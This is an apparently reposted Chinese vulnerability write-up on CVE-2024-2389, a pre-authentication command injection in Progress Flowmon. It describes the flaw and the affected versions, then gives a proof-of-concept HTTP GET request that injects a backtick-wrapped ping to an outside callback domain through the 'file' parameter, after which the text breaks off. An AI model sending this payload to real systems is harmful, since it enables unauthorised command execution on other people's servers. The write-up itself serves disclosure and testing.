看啥推荐读物
专栏名称: 渗透Xiao白帽
早起的鸟儿有虫吃!相互学习分享涨知识。会不定期分享一些网络安全相关内容.
今天看啥  ›  专栏  ›  渗透Xiao白帽

CVE-2024-2389命令执行漏洞 (附EXP)

渗透Xiao白帽  · 公众号  ·  · 2024-05-10 23:46
网安引领时代,弥天点亮未来    0x00写在前面      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!0x01漏洞介绍Progress Flowmon是Progress公司的一个实时网络流量监控工具。Progress Flowmon 11.1.14之前的11.x版本和12.3.5之前的12.x版本存在安全漏洞,该漏洞源于存在操作系统命令注入漏洞,未经身份验证的用户可以通过管理界面访问系统,从而执行任意系统命令。0x02影响版本Progress Flowmon 11.1.14之前的11.x版本和12.3.5之前的12.x版本0x03漏洞复现1.访问漏洞环境2.对漏洞进行复现 POC (GET)漏洞复现GET /service.pdfs/confluence?lang=en&file=`ping%20wpzmtaazjp.dgrh3.cn` HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip              ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照